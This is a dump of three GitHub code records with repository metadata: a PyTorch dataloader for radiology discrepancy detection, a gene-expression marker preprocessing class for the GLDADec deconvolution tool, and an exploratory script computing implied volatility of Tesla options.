'.xlsx')\n #train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated/second_and_third_labeled_df'+ '.xlsx')\n #training set\n #train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train/seed' + str(config[\"seed\"]) + '/train_df_seed' +str(config[\"seed\"]) + '.xlsx')\n train_loc = os.path.join(dir_base, 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train_first_second_labeled/seed' + str(config[\"seed\"]) + '/train_df_seed' +str(config[\"seed\"]) + '.xlsx')\n train_df = pd.read_excel(train_loc, engine='openpyxl')\n\n #valid_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_finetuning/seed' +str(config[\"seed\"]) + '/valid_df_seed' +str(config[\"seed\"]) + '.xlsx')\n #valid_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train/seed' +str(config[\"seed\"]) + '/valid_df_seed' +str(config[\"seed\"]) + '.xlsx')\n valid_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_first_train_first_second_labeled/seed' +str(config[\"seed\"]) + '/valid_df_seed' +str(config[\"seed\"]) + '.xlsx')\n valid_df = pd.read_excel(valid_loc, engine='openpyxl')\n\n test_loc = os.path.join(dir_base,'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_v1/seed' +str(config[\"seed\"]) + '/test_df_seed' +str(config[\"seed\"]) + '.xlsx')\n test_df = pd.read_excel(test_loc, engine='openpyxl')\n\n fine_tuning = True\n if fine_tuning:\n\n train_loc = os.path.join(dir_base,\n 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_finetune/seed' + str(\n config[\"seed\"]) + '/train_df_seed' + str(config[\"seed\"]) + '.xlsx')\n train_df = pd.read_excel(train_loc, engine='openpyxl')\n\n valid_loc = os.path.join(dir_base,\n 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_finetune/seed' + str(\n config[\"seed\"]) + '/valid_df_seed' + str(config[\"seed\"]) + '.xlsx')\n valid_df = pd.read_excel(valid_loc, engine='openpyxl')\n\n test_loc = os.path.join(dir_base,\n 'Zach_Analysis/result_logs/discrepancy_detection/third_labeling_batch/data_folder_updated_v1/seed' + str(\n config[\"seed\"]) + '/test_df_seed' + str(config[\"seed\"]) + '.xlsx')\n test_df = pd.read_excel(test_loc, engine='openpyxl')\n\n save_df = True\n if save_df:\n save_location = config[\"save_location\"]\n train_dataframe_location = os.path.join(save_location, 'train_df_seed' + str(config[\"seed\"]) + '.xlsx')\n print(train_dataframe_location)\n train_df.to_excel(train_dataframe_location, index=True)\n\n valid_dataframe_location = os.path.join(save_location, 'valid_df_seed' + str(config[\"seed\"]) + '.xlsx')\n print(valid_dataframe_location)\n valid_df.to_excel(valid_dataframe_location, index=True)\n\n #test_dataframe_location = os.path.join(save_location, 'test_df_seed' + str(config[\"seed\"]) + '.xlsx')\n #print(test_dataframe_location)\n #test_df.to_excel(test_dataframe_location, index=True)\n\n training_set = TextDataset(train_df, tokenizer, dir_base=dir_base, wordDict= wordDict)\n valid_set = TextDataset(valid_df, tokenizer, dir_base=dir_base)\n test_set = TextDataset(test_df, tokenizer, dir_base=dir_base)\n\n train_params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 4\n }\n\n test_params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 4\n }\n\n ## added to trying sampling from training data\n #y_train_indices = training_set.indices\n #y_train_indices = range(0,len(train_df)) #gets a list of the index 0 to lenth of df\n #y_train = [training_set.targets[i] for i in y_train_indices] #get a list of all of the training labels\n #print(f\"y train: {y_train}\")\n #print(f\"y train len: {len(y_train)}\")\n #class_sample_count = np.array(\n # [len(np.where(y_train == t)[0]) for t in np.unique(y_train)]) # counts the number of each training value\n #print(type(class_sample_count))\n #print(f\"class sample count: {class_sample_count}\")\n\n #class_sample_count = np.array([1134, 94]) #sets the counts to the values in the orginal set\n #class_sample_count = np.array([1228, 1228])\n #class_sample_count = np.array([94, 1134])\n #class_sample_count = np.array([94, 1134])\n\n #print(f\"class sample count: {class_sample_count}\")\n #print(type(class_sample_count))\n\n #class_sample_count = [1134, 94]\n #weight = 1. / class_sample_count # calculates the weight for each sample\n #weight = np.array([1134/1758, 94/1758])\n #weight = np.array([1271/1762, 105/1762])\n #weight = np.array([100, 105/1762])\n\n\n #print(f\"weight values: {weight}\")\n #samples_weight = np.array([weight[t] for t in y_train]) # makes an array where each index is the weight to select it\n #print(f\"len of sample weights: {len(samples_weight)}\")\n #samples_weight = torch.from_numpy(samples_weight)\n #print(f\"samples weight: {samples_weight}\")\n #sampler = WeightedRandomSampler(samples_weight.type('torch.DoubleTensor'), 1368, replacement=False) # was 1228\n\n #y = torch.from_numpy(np.array([0, 0, 1, 1, 0, 0, 1, 1]))\n #y = torch.from_numpy(np.array(y_train))\n #sampler = StratifiedSampler(class_vector=y, batch_size=16)\n\n #training_loader = DataLoader(training_set, sampler=sampler, batch_size=BATCH_SIZE, num_workers=4)\n ##\n training_loader = DataLoader(training_set, **train_params)\n\n valid_loader = DataLoader(valid_set, **test_params)\n test_loader = DataLoader(test_set, **test_params)\n\n return training_loader, valid_loader, test_loader\n\n\ndef setup_random_training_loader(df_negative, df_positive, base_pos, base_neg, new_pos, new_neg, config, tokenizer, wordDict=None):\n # base dataest is 1134 negatives for 94 postives\n\n seed = config[\"seed\"]\n dir_base = config[\"dir_base\"]\n BATCH_SIZE = config[\"batch_size\"]\n\n #train_df_positive = df_positive.sample(n=21)\n #train_df = pd.concat([train_df_positive, df_negative])\n #train_df = pd.concat([ train_df, base_pos])\n #df_negative = df_negative.sample(n=1134)\n #df_positive = df_positive.sample(n=94)\n #train_df = pd.concat([df_negative, base_pos])\n\n #added_pos = new_pos.sample(11) #get n samples from positves cases\n #postive_df = pd.concat([base_pos, added_pos]) #add the n samples to the already postive cases\n #negative_df = pd.concat([base_neg, new_neg]) #add the new negative samples to the negative cases\n #train_df = pd.concat([postive_df, negative_df]) #create final training set\n\n train_df = pd.concat([base_pos, base_neg])\n\n training_set = TextDataset(train_df, tokenizer, dir_base=dir_base, wordDict= wordDict)\n\n\n train_params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 4\n }\n\n training_loader = DataLoader(training_set, **train_params)\n\n return training_loader", "repo_name": "zhuemann/discrepancy_detection", "sub_path": "dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 12524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 95, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 100, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 102, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 113, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 117, "usage_type": "call"}, {"api_name": "sklearn.model_selection", "line_number": 117, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 271, "usage_type": "call"}]} +{"seq_id": "24748458957", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 23 06:14:31 2022\n\n@author: docker\n\"\"\"\nimport copy\nimport random\nimport itertools\nimport collections\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom gldadec import utils\n\nclass SetData():\n def __init__(self,verbose=True):\n self.verbose = verbose\n self.raw_df = None\n self.marker_dic = None\n self.final_int = None\n self.input_mat = None\n \n def set_expression(self,df):\n \"\"\"\n Set gene expression data.\n It is better to keep as many genes as possible.\n ----------\n df : DataFrame\n Genes in rows and samples in columns.\n \"\"\"\n df.index = [t.upper() for t in df.index.tolist()] # re-index\n self.raw_df = df\n if self.verbose:\n a,b = self.raw_df.shape\n print(a,'genes')\n print(b,'samples')\n \n def set_marker(self,marker_dic:dict):\n \"\"\"\n Set marker list for each cell\n ----------\n marker_dic : dict\n \n \"\"\"\n # convert uppercase\n new_v = []\n new_k = []\n for i,k in enumerate(marker_dic):\n if len(marker_dic.get(k)) > 0:\n tmp_v = sorted([t.upper() for t in marker_dic.get(k)])\n new_v.append(tmp_v)\n new_k.append(k)\n else:\n pass\n marker_dic2 = dict(zip(new_k,new_v))\n self.marker_dic = marker_dic2\n if self.verbose:\n print(len(self.marker_dic),'cells')\n print(len(marker_dic)-len(self.marker_dic),'cells were removed (markers were not registered)')\n \n def marker_info_processing(self,do_plot=True):\n # reflect expression data\n marker_dic = self.marker_dic\n genes = self.raw_df.index.tolist()\n new_v = []\n new_k = []\n for i,k in enumerate(marker_dic):\n marker = marker_dic.get(k)\n tmp_common = sorted(list(set(marker) & set(genes)))\n if len(tmp_common) > 0:\n tmp_v = [t.upper() for t in tmp_common]\n new_v.append(tmp_v)\n new_k.append(k)\n else:\n pass\n marker_dic3 = dict(zip(new_k,new_v))\n self.marker_dic = marker_dic3\n marker_genes = set(list(itertools.chain.from_iterable(list(self.marker_dic.values()))))\n if self.verbose:\n print('--- reflect genes in expression ---')\n print(len(self.marker_dic),'cells')\n print(len(marker_dic)-len(self.marker_dic),'cells were removed (markers were not registered)')\n print(len(marker_genes),'genes were registered')\n \n # plot the original registered marker size\n if do_plot:\n y = [len(t) for t in self.marker_dic.values()]\n x = [i for i in range(len(y))]\n plt.bar(x,y)\n plt.xticks(x,self.marker_dic.keys(),rotation=75)\n plt.title('Original Marker Size')\n plt.show()\n \n # detect cell specific markers\n count_dic = dict(collections.Counter(list(itertools.chain.from_iterable(list(self.marker_dic.values())))))\n sort_count = sorted(count_dic.items(),key=lambda x : x[1])\n unique_marker = [] # no overlap\n for t in sort_count:\n if t[1] == 1:\n unique_marker.append(t[0])\n else:\n pass\n new_v = []\n new_k = []\n for i,k in enumerate(self.marker_dic):\n tmp_v = sorted(list(set(self.marker_dic.get(k)) & set(unique_marker)))\n if len(tmp_v) > 0:\n new_v.append(tmp_v)\n new_k.append(k)\n else:\n pass\n self.spe_marker_dic = dict(zip(new_k,new_v))\n spe_marker_genes = set(list(itertools.chain.from_iterable(list(self.spe_marker_dic.values()))))\n if self.verbose:\n print('--- extract cell specific marker ---')\n print(len(self.spe_marker_dic),'cells')\n print(set(self.marker_dic.keys())-set(self.spe_marker_dic.keys()),'cells were removed (no marker after removing overlap)')\n print(len(spe_marker_genes),'genes were registered')\n \n # plot the cell specific marker size\n if do_plot:\n y = [len(t) for t in self.spe_marker_dic.values()]\n x = [i for i in range(len(y))]\n plt.bar(x,y)\n plt.xticks(x,self.spe_marker_dic.keys(),rotation=75)\n plt.title('Specific Marker Size')\n plt.show()\n \n def set_random(self,random_sets:list):\n \"\"\"\n Random states list\n ----------\n random_sets : list\n e.g. [1448, 1632, 5913, 7927, 8614,...]\n \"\"\"\n self.random_sets = random_sets\n \n def expression_processing(self,random_genes=None,random_n=0,specific=True,random_s=None,prior_norm=True,norm_scale=1000):\n \"\"\"\n 1. Determine if the markers are cell specific.\n 2. Add non-marker gene at random.\n 3. Process expression data into a format for analysis\n ----------\n random_n : int\n DESCRIPTION. The default is 0.\n specific : bool\n DESCRIPTION. The default is True.\n \"\"\"\n if specific:\n if self.verbose:\n print('use specific markers')\n self.marker_final_dic = self.spe_marker_dic\n else:\n if self.verbose:\n print('use overlap markers')\n self.marker_final_dic = self.marker_dic\n \n genes = list(itertools.chain.from_iterable(list(self.marker_final_dic.values()))) # marker genes\n \n raw_df = copy.deepcopy(self.raw_df)\n if random_s is None:\n random_s = self.random_sets[0]\n random.seed(random_s)\n random_candidates = sorted(list(set(raw_df.index.tolist()) - set(genes))) # total genes - marker genes\n if random_genes is None:\n random_genes = random.sample(random_candidates,random_n) # choose genes from non-marker genes\n if self.verbose:\n print(len(random_genes),'genes were added at random')\n else:\n pass\n \n union = sorted(list(set(random_genes) | set(genes)))\n common = sorted(list(set(raw_df.index.tolist()) & set(union))) # fix the output gene order\n target_df = raw_df.loc[common]\n\n # prior information normalization\n if prior_norm:\n linear_norm = utils.freq_norm(target_df,self.marker_final_dic)\n linear_norm = linear_norm.loc[sorted(linear_norm.index.tolist())]\n final_df = linear_norm/norm_scale\n else:\n final_df = target_df/norm_scale\n self.final_int = final_df.astype(int) # convert int\n self.input_mat = np.array(self.final_int.T,dtype='int64')\n\n # seed-topic preparation\n gene_names = [t.upper() for t in self.final_int.index.tolist()]\n self.gene2id = dict((v, idx) for idx, v in enumerate(gene_names))\n self.random_genes = random_genes\n \n def expression_processing2(self,specific=True):\n \"\"\"\n 1. Determine if the markers are cell specific.\n 2. Add non-marker gene at random to each topic.\n 3. Process expression data into a format for analysis\n ----------\n specific : bool\n DESCRIPTION. The default is True.\n \"\"\"\n if specific:\n if self.verbose:\n print('use specific markers')\n self.marker_final_dic = self.spe_marker_dic\n else:\n if self.verbose:\n print('use overlap markers')\n self.marker_final_dic = self.marker_dic\n \n marker_final_dic = copy.deepcopy(self.marker_final_dic)\n genes = list(itertools.chain.from_iterable(list(marker_final_dic.values()))) # marker genes\n raw_df = copy.deepcopy(self.raw_df)\n\n random_list = []\n new_list = []\n for i,k in enumerate(marker_final_dic):\n m = marker_final_dic.get(k)\n random_candidates = sorted(list(set(raw_df.index.tolist()) - set(genes))) # total genes - marker genes\n random.seed(i)\n random_gene = random.sample(random_candidates,len(m))\n m.extend(random_gene)\n new_list.append(sorted(m))\n random_list.append(random_gene)\n genes.extend(random_gene)\n new_dic = dict(zip(list(marker_final_dic.keys()), new_list))\n # FIXME: overwrite\n self.marker_final_dic = new_dic\n \n common = list(itertools.chain.from_iterable(list(new_dic.values()))) # marker genes\n final_df = raw_df.loc[common]\n self.final_int = final_df.astype(int) # convert int\n self.input_mat = np.array(self.final_int.T,dtype='int64')\n\n # seed-topic preparation\n gene_names = [t.upper() for t in self.final_int.index.tolist()]\n self.gene2id = dict((v, idx) for idx, v in enumerate(gene_names))\n #self.random_genes = random_genes\n \n def seed_processing(self):\n \"\"\"\n Prepare seed information for use as a guide.\n \n input_mat : np.array\n samples are in rows and genes (markers) are in columns.\n array([[7, 4, 5, ..., 4, 9, 4],\n [7, 4, 5, ..., 5, 8, 4],\n [6, 4, 4, ..., 4, 9, 5],\n ...,\n [7, 4, 4, ..., 4, 8, 4],\n [7, 4, 5, ..., 4, 9, 4],\n [8, 4, 4, ..., 4, 9, 4]])\n seed_topics : dict\n seed_topics: dict\n e.g.{0: [4,3],\n 1: [4],\n 2: [1],\n 3: [1,3,5],\n 4: [1],\n 5: [7]}\n seed_k : list\n [1,3,5,7,9,11,13]\n marker_final_dic : dcit\n {'B cells memory': ['AIM2', 'CR2', 'JCHAIN'],\n 'B cells naive': ['BCL7A', 'CD24', 'FCER2', 'IL4R', 'PAX5', 'TCL1A'],\n 'Monocytes': ['ALOX5AP','C5AR1','CCR2','CD14','CD163','CD274',...]}\n\n \"\"\"\n if self.marker_final_dic is None:\n raise ValueError('!! Final Marker Candidates were not defined !! --> run expression_processing()')\n # seed_topic preparation\n genes = list(itertools.chain.from_iterable(list(self.marker_final_dic.values())))\n target = list(self.marker_final_dic.keys())\n seed_topic_list = [self.marker_final_dic.get(t) for t in target]\n seed_topics = {}\n finish_genes = []\n for t_id, st in enumerate(seed_topic_list):\n for gene in st:\n try:\n if gene in finish_genes:\n tmp = seed_topics[self.gene2id[gene]]\n seed_topics[self.gene2id[gene]] = tmp + [t_id]\n else:\n seed_topics[self.gene2id[gene]] = [t_id]\n finish_genes.append(gene)\n except:\n # not included in target expression table\n print(gene)\n pass\n \n # reliable gene\n genes = list(itertools.chain.from_iterable(list(self.marker_final_dic.values())))\n seed_k = []\n for g in genes:\n if self.gene2id.get(g) is None:\n #print(g)\n pass\n else:\n seed_k.append(self.gene2id.get(g))\n\n self.seed_topics = seed_topics\n seed_k = sorted(list(set(seed_k)))\n self.seed_k = seed_k\n \n if self.verbose:\n print(\"final genes:\",len(self.final_int))\n print('seed number:',len(self.seed_topics))\n print(\"seed_k:\",len(self.seed_k))\n\ndef main():\n raw_df = pd.read_csv('/mnt/AzumaDeconv/github/GLDADec/data/GSE65133/GSE65133_expression.csv',index_col=0)\n marker_dic = pd.read_pickle('/mnt/AzumaDeconv/github/GLDADec/data/domain_info/human_PBMC_CellMarker_8cell_raw_dic_v1.pkl')\n random_sets = pd.read_pickle('/mnt/AzumaDeconv/github/GLDADec/data/random_info/100_random_sets.pkl')\n\n SD = SetData()\n SD.set_expression(df=raw_df) \n SD.set_marker(marker_dic=marker_dic)\n SD.marker_info_processing(do_plot=True)\n SD.set_random(random_sets=random_sets)\n SD.expression_processing(random_n=0,specific=True)\n SD.seed_processing()\n \n # Collect data to be used in later analyses\n input_mat = SD.input_mat\n final_int = SD.final_int\n seed_topics = SD.seed_topics\n marker_final_dic = SD.marker_final_dic\n \n # save\n out_path = '/mnt/AzumaDeconv/github/GLDADec/Dev/test_data/'\n pd.to_pickle(final_int,out_path+'final_int.pkl')\n pd.to_pickle(seed_topics,out_path+'seed_topics.pkl')\n pd.to_pickle(marker_final_dic,out_path+'marker_final_dic.pkl')\n\nif __name__ == '__main__':\n main()", "repo_name": "mizuno-group/GLDADec", "sub_path": "run/dev1_set_data.py", "file_name": "dev1_set_data.py", "file_ext": "py", "file_size_in_byte": 12913, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.chain.from_iterable", "line_number": 81, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 81, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 98, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 98, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 98, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 116, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "itertools.chain.from_iterable", "line_number": 161, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 161, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 163, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 166, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 169, "usage_type": "call"}, {"api_name": "gldadec.utils.freq_norm", "line_number": 181, "usage_type": "call"}, {"api_name": "gldadec.utils", "line_number": 181, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 212, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 213, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 213, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 214, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 221, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 222, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 231, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 231, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 234, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 273, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 273, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 293, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 312, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 314, "usage_type": "call"}, {"api_name": "pandas.to_pickle", "line_number": 332, "usage_type": "call"}, {"api_name": "pandas.to_pickle", "line_number": 333, "usage_type": "call"}, {"api_name": "pandas.to_pickle", "line_number": 334, "usage_type": "call"}]} +{"seq_id": "71010364996", "text": "#%%\r\nfrom py_vollib.black_scholes import black_scholes as bs\r\nfrom py_vollib.black_scholes.greeks.analytical import vega\r\nfrom py_vollib.black_scholes.implied_volatility import implied_volatility\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\n# %%\r\ndef implied_vol(S0, K, T, r, market_price, flag='c', tol=0.00001):\r\n \"\"\"Calculating the implied volatility of an European option\r\n S0: stock price\r\n K: strike price\r\n T: time to maturity\r\n r: risk-free rate\r\n market_price: option price in market\r\n \"\"\"\r\n max_iter = 200 #max no. of iterations\r\n vol_old = 0.3 #initial guess \r\n\r\n for k in range(max_iter):\r\n bs_price = bs(flag, S0, K, T, r, vol_old)\r\n Cprime = vega(flag, S0, K, T, r, vol_old)*100\r\n C = bs_price - market_price\r\n\r\n vol_new = vol_old - C/Cprime\r\n new_bs_price = bs(flag, S0, K, T, r, vol_new)\r\n if (abs(vol_old-vol_new) < tol or abs(new_bs_price-market_price) < tol):\r\n break\r\n\r\n vol_old = vol_new\r\n\r\n implied_vol = vol_new\r\n return implied_vol\r\n#%%\r\nS0, K, t, r = 83.11, 80, 1/250, 0.025\r\nmarket_price = 3.23\r\niv, iter = implied_vol(S0, K, t, r, market_price)\r\nprint(\"La volatilidad implicita {0:5.2f}, fue calculada con {1:.0f}\".format(iv*100, iter))\r\n\r\n# %%\r\nbs_over_iv = [ bs('c', S0, K, t, r, iv/100) for iv in range(0,100,1) ]\r\nplt.figure()\r\nplt.plot(bs_over_iv)\r\nplt.title('BS prima')\r\nplt.xlabel('Implied Volatility (%)')\r\nplt.ylabel('Call Price ($)')\r\nplt.show()\r\n\r\n#%%\r\ndef implied_vol2(S0, K, t, r, market_price, flag='c', exa=0.00001, vol_old=0.3, max_iter=200):\r\n \"\"\"Calculating the implied volatility of an European option\r\n S0: stock price\r\n K: strike price\r\n T: time to maturity\r\n r: risk-free rate\r\n market_price: option price in market\r\n flag: c or p\r\n acc: accuracy / error tolerance\r\n vol_old: initial guess\r\n max_iter: max no. of iterations\r\n \"\"\"\r\n err_vol = float('inf')\r\n err_prc = float('inf')\r\n iter = 0\r\n bs_price = bs(flag, S0, K, t, r, vol_old)\r\n while err_vol > exa or err_prc > exa or iter > max_iter:\r\n Cprime = vega(flag, S0, K, t, r, vol_old)*100\r\n C = bs_price - market_price\r\n vol_new = vol_old - C/Cprime\r\n new_bs_price = bs(flag, S0, K, t, r, vol_new)\r\n err_vol = abs(vol_old - vol_new)\r\n err_prc = abs(new_bs_price - market_price)\r\n vol_old = vol_new\r\n bs_price = new_bs_price\r\n iter += 1\r\n\r\n implied_vol = vol_new\r\n return implied_vol\r\n\r\nS0, K, t, r = 83.11, 80, 1/250, 0.025\r\nmarket_price = 5\r\n#iv, iter = implied_vol(S0, K, t, r, market_price)\r\n#print(\"La volatilidad implicita {0:5.2f}, fue calculada con {1:.0f}\".format(iv*100, iter))\r\n\r\n#%%\r\n\r\ndata = pd.read_csv('C:/Users/nuno/OneDrive - ITESO/Ciencia de Datos'\r\n '/idi_ii/tsla_options_last.csv')\r\ndata.head()\r\ntest = data[10:11]\r\n# %%\r\nS = 1132\r\nr = 0.0025\r\n#%%\r\ntest['iv'] = test.apply(lambda row: implied_vol(S,\r\n row['Strike'],\r\n row['tau'],\r\n r,\r\n row['Last Sale']), axis=1)\r\n# %%\r\n\r\ntest['iv'] = test.apply(lambda row: implied_volatility(row['Last Sale'],\r\n S,\r\n row['Strike'],\r\n row['tau'],\r\n r,\r\n row['type']), axis=1)\r\n\r\n#%%\r\niv_vctr = [implied_volatility(row[2],\r\n S,\r\n row[7],\r\n row[8],\r\n r,\r\n row[9]) for row in test]\r\n\r\n#%%\r\niv_vctr = []\r\nfor index, row in test.iterrows():\r\n print(bs(row['type'], S, row['Strike'], row['tau'], r, 0))\r\n print(row['Last Sale'])\r\n if bs(row['type'], S, row['Strike'], row['tau'], r, 0) < row['Last Sale']:\r\n iv_vctr.append(implied_volatility(row['Last Sale'],S,row['Strike'],row['tau'],r,row['type']))\r\n else:\r\n iv_vctr.append(0)\r\n#%%\r\n\r\niv_vctr_be_rational = []\r\nfor index, row in data.iterrows():\r\n if bs(row['type'], S, row['Strike'], row['tau'], r, 0) < row['Last Sale']:\r\n try:\r\n iv_vctr_be_rational.append(implied_volatility(row['Last Sale'],S,row['Strike'],row['tau'],r,row['type']))\r\n except:\r\n iv_vctr_be_rational.append(0)\r\n else:\r\n iv_vctr_be_rational.append(0)\r\n\r\n#%%\r\niv_vctr_newton = []\r\nfor index, row in data.iterrows():\r\n print(index)\r\n try:\r\n if bs(row['type'], S, row['Strike'], row['tau'], r, 0) < row['Last Sale']:\r\n try:\r\n iv_vctr_newton.append(implied_vol2(S,row['Strike'],row['tau'],r, row['Last Sale'], flag=row['type']))\r\n except:\r\n iv_vctr_newton.append(0)\r\n else:\r\n iv_vctr_newton.append(0)\r\n except:\r\n iv_vctr_newton.append(0)\r\n\r\n#%%\r\ndata['iv'] = iv_vctr_be_rational\r\n#%%\r\nsns.relplot(\r\n data=data[data.iv != 0], x='Strike', y='iv', hue='type', col='Expiration Date', kind='scatter', col_wrap=3\r\n).set(ylim=(0, 5))\r\n\r\n#%%\r\nimplied_volatility(587.5, S, 550, 0.0083, r, 'c')\r\nimplied_vol(S, 550, 0.0083, r, 587,)\r\n# %%\r\nbs('c', S,550, 0.0083, r,4)\r\n# %%\r\n", "repo_name": "daniel-nuno/IDI-II", "sub_path": "code/proyecto_iv_newton.py", "file_name": "proyecto_iv_newton.py", "file_ext": "py", "file_size_in_byte": 5545, "program_lang": "python", "lang": "en", "doc_type": 